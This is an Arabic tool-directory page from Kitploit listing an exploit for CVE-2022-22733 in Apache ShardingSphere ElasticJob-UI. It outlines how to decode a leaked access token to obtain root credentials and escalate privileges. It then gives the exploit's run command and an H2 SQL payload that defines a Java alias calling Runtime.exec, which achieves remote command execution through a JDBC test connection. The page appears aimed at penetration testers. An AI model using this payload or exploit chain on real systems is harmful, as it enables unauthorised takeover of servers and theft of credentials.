Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22733 — Apache ShardingSphere ElasticJob-UI: استغلال تصعيد الامتيازات و RCE | Kitploit
أدوات/GitHubGitHub/zeyad-azima/cve-2022-22733
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubzeyad-azima/cve-2022-22733

CVE-2022-22733

Apache ShardingSphere ElasticJob-UI: استغلال تصعيد الامتيازات و RCE

عرض المستودع
21منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22733

CVE-2022-22733 هي ثغرة أمنية تؤثر على Apache ShardingSphere ElasticJob-UI الإصدار 3.0.0 وما دونه، وتؤدي الثغرة إلى تصعيد الامتيازات (Privilege Escalation). ولكن، من خلال إساءة استخدام الامتيازات المُصعّدة يمكن تنفيذ هجوم JDBC وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكنك قراءة تحليل الثغرة من هنا ومدونة كتابة الاستغلال خطوة بخطوة من هنا.

elasticjob

يعمل الاستغلال على النحو التالي:

  • تسجيل الدخول باستخدام الحساب منخفض الامتيازات.
  • الحصول على accessToken المُنشأ بشكل غير آمن.
  • فك ترميز accessToken المُنشأ بشكل غير آمن.
  • تحليل البيانات المُفككة من accessToken.
  • استرجاع بيانات اعتماد حساب root من البيانات التي تم تحليلها.
  • تسجيل الدخول باستخدام بيانات اعتماد حساب root والحصول على صلاحيات كاملة على التطبيق.
  • إرسال طلب اختبار الاتصال مع إساءة استخدام هجوم ``JDBC`.

الاستخدام

يمكنك تنزيل ملف JAR من هنا وشفرة المصدر من هنا.

  • تشغيل jar:
root@kitploit:~
java -jar CVE-2022-22733.jar
  • كود سكربت SQL:
root@kitploit:~
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')

عرض توضيحي

idea64_5Ru1DeWcKE

تنزيل الأداة